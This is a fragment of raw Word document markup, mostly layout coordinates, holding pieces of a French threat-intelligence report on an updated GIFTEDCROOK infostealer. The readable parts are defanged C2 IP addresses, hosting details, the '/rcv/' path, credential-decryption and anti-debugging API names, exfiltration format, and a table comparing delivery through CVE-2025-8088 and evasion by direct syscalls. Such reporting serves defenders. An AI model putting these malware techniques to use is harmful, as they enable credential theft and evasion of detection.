                            <a:pt x="1976120" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="197612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1975484" y="351155"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="197548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179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2411104</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5760719" cy="506729"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="39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5067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50672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506729"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="50672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486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7581909</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5760085" cy="523875"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="39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523875">
                          <a:moveTo>
                            <a:pt x="2898140" y="523875"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760085" y="523875"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760085" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="2898140" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="2898140" y="523875"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="1357629" y="523875"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2897505" y="523875"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="2897505" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1357629" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1357629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1356994" y="523875"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1356994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69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2832735" cy="351155"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="39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273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2735" h="351155">
                          <a:moveTo>
                            <a:pt x="1976120" y="351155"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2832735" y="351155"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="2832735" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1976120" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="197612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1975484" y="351155"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="197548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793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2411104</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5760719" cy="506729"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="39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5067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506729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506729"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="50672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7100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7581909</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5760085" cy="523875"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="39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523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523875">
                          <a:moveTo>
                            <a:pt x="2898140" y="523875"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760085" y="523875"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760085" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="2898140" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="2898140" y="523875"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="1357629" y="523875"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2897505" y="523875"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="2897505" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1357629" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1357629" y="523875"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="523875"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1356994" y="523875"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1356994" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="52387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7920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2839719" cy="1421129"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="39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9719" cy="1421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39719" h="1421129">
                          <a:moveTo>
                            <a:pt x="2836544" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2836544" y="1421129"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1979295" y="6349"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1979295" y="1414780"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="3175" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3175" y="1421129"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="1417954"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2839719" y="1417954"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="1063625"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2833369" y="1063625"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="709295"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2833369" y="709295"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="354964"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2833369" y="354964"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="3174"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2839719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148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7581909</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5767070" cy="1579880"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="39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157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1579880">
                          <a:moveTo>
                            <a:pt x="3175" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3175" y="1579880"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="1576705"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5767070" y="1576705"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="1052195"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760720" y="1052195"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="527685"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760720" y="527685"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="3175"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5767070" y="317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2512" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2258060</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>7588259</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="1567180"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="39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5671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567180">
                          <a:moveTo>
                            <a:pt x="0" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="156718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3536" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3798570</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>7588259</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="1567180"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="40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5671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567180">
                          <a:moveTo>
                            <a:pt x="0" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="156718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4560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7581909</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="1579880"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="40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579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579880">
                          <a:moveTo>
                            <a:pt x="0" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="157988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763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40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1728" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>5151755</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>3556009</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="444503" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="40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450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450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444500" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="44450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3776" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2455545</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>5581659</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="40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5824" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>946784</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>5581659</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="40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7872" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3754755</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>5581659</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="40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9920" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2573655</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>5581659</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="40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11968" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>5136514</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>5581659</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="40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0160" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1750060</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>5581659</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2862579" cy="415289"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="40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2579" cy="4152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2579" h="415289">
                          <a:moveTo>
                            <a:pt x="2861944" y="215900"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2861944" y="415289"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1516379" y="216535"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2862579" y="216535"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="635" y="415289"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="635" y="215900"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1426844" y="215900"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1426844" y="415289"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="216535"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1427479" y="216535"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="2122805" y="199390"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2122805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630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5797559</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2366648" cy="414020"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="40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66648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66644" h="414020"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1590674" y="214629"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1590674" y="414020"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="215264"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1591309" y="215264"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="2366644" y="199389"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2366644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732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835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9376" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1315084</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1002053</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1184075" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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40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Adresse IP du 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0400" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3166745</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1002053</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="314842" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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8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14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1347100</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1492764" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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3"/>
                          </w:rPr>
                          <w:t xml:space="preserve">136[.]0[.]141[.]112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2448" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2912745</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1354478</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="400918" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="40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9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9200*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34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1701430</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1569459" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="40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945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38[.]225[.]209[.]122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4496" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2912745</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1708808</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="400918" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="40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9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8009*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55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2055760</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1416069" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="40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4"/>
                          </w:rPr>
                          <w:t xml:space="preserve">23[.]26[.]237[.]80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6544" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2912745</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>2063138</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="400918" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="40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9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8941*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2381273</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="40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* Trend Micro n’a observé aucun échantillon communiquant directement avec ces adresses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8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2554628</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="40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IP. Il s’agit d’hôtes accessibles via un certificat TLS auto-signé dont le nom commun (CN)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9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2727983</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5218986" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="40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89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"john" et qui recoupe les quatre premières adresses IP répertoriées dans le tableau.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0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3002938</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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Les sept serveurs sont hébergés chez Evoxt Sdn. Bhd. (AS149440), un fournisseur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1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3176293</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="40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malaisien de serveurs virtuels (VPS) disposant de points de présence à travers l’Europe.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2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3349648</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="40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Ces serveurs sont répartis entre la France, les Pays-Bas (deux serv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eurs) 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t la Suisse. Tous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3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3541618</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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utilisent des ports élevés non standard et le même chemin URI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/rcv/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), ce qui indique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4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3738268</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2643057" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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30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l’utilisation d’outils communs côté serveur.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5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4268782</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5848847" cy="267667"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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8847" cy="26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21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27"/>
                          </w:rPr>
                          <w:t xml:space="preserve">6.</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle22"/>
                            <w:spacing w:val="227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2"/>
                            <w:spacing w:val="-3"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> De GIFTEDCROOK à</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle22"/>
                            <w:spacing w:val="27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2"/>
                            <w:spacing w:val="-1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73"/>
                            <w:spacing w:val="73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22"/>
                            <w:spacing w:val="28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2"/>
                            <w:spacing w:val="-6"/>
                          </w:rPr>
                          <w:t xml:space="preserve">: principales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6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4568145</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1254450" cy="262309"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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4450" cy="2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33"/>
                          </w:rPr>
                          <w:t xml:space="preserve">modifications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7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5019305</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="40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L'analyse de Trend Micro confirme que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appartient à la même famille de logiciels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8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5201943</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="40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malveillants que GIFTEDCROOK. Les deux partagent la même chaîne d'outils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9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5375298</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="40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compilation </w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="29"/>
                            <w:u w:val="single" w:color="000000"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> (MSVC C++, x64),</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="106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3"/>
                            <w:u w:val="single" w:color="000000"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> le même ensemble d'API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 cryptographiques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0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5568973</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="82521" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="40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1904" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>965834</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>5567268</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5770128" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="40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12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CryptUnprotectData</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="27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CryptImportKey</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="27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BCryptGenRandom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  <w:u w:val="single" w:color="000000"/>
                          </w:rPr>
                          <w:t xml:space="preserve">), les mêmes contrôles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2928" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3286125</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>5782533</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3450473" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="40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5047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wine_get_version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) et le même format d'exfiltration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3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5782533</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2402570" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="40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2570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anti-analyse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IsDebuggerPresent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497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5997798</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1648343" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="40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834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multipart/form-data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6299223</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="40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Les caractéristiques du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runtime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C++ indiquent la même norme C++20, tandis que la version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7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6470873</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5834898" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="40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de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libcurl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est passée de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8.12.1-DEV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 à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8.14.0-DEV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. Les versions intermédiaires (v1.2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8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6649108</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="40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et v1.3, documentées par Arctic Wolf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40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) avaient déjà ajouté des capacités de vol de fichiers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9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6819530</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="40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tout en continuant à utiliser Telegram pour l’exfiltration ;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poursuit et étend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0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7002168</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="687537" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="40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53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trajectoire.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1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7277123</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3916283" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="40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162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Ces modifications constituent une mise à niveau substantielle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2144" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2513330</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>7593353</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1106688" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="40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66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GIFTEDCROOK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3168" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>4276090</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>7673605</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1943807" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="40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380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74"/>
                            <w:spacing w:val="44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(évolution, 2026)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4192" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1347469</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>7679713</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="501341" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="40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3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Aspect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5216" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2536189</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>7766708</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1021305" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="40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13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(original, 2025)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6240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8117863</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2868178" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="40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1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DLL chargée uniquement en mémoire via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72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8204223</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="702926" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="40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292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Format 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8288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8204223</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="974944" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="40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49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EXE autonome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9312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8291218</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1680827" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="40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082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appels système NT directs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0336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8642373</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2868178" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="40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1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Chaîne d'exploitation de la vulnérabilité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13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8728733</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1269991" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="40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99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Vecteur de diffusion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2384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8728733</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1261309" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="40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130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Macro Excel (.xlsm)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3408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8815728</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1448248" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="40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82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RAR5 CVE-2025-8088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4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5353341" cy="146037"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="40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334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40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https://arcticwolf.com/resources/blog/giftedcrook-strategic-pivot-from-browser-stealer-to-data-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5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1149768" cy="146037"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="40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976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exfiltration-platform/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648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0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750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0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852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0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955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0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8057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0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68467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60085" cy="523874"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="40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085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085" h="523874">
                          <a:moveTo>
                            <a:pt x="0" y="523874"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1356994" y="523874"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1356994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  <a:moveTo>
                            <a:pt x="2898140" y="523874"/>
